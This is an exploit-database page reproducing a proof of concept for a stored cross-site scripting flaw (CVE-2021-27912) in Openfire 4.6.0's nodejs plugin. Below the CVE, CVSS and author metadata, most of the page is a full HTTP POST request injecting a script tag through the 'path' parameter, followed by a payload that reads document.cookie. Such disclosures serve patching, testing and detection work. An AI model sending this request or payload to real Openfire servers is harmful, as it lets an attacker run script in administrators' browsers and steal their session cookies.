Advertisement






Openfire 4.6.0 Cross Site Scripting

CVE Category Price Severity
CVE-2021-27912 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Gionathan Reale High Remote 2020-12-10
CPE
cpe:cpe:/a:igniterealtime:openfire:4.6.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120066

Below is a copy:

Openfire 4.6.0 Cross Site Scripting
# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS
# Date: 20201209
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0

POST /plugins/nodejs/nodejs.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 60
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save

payload"><ScRiPt>alert(document.cookie)</ScRiPt>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum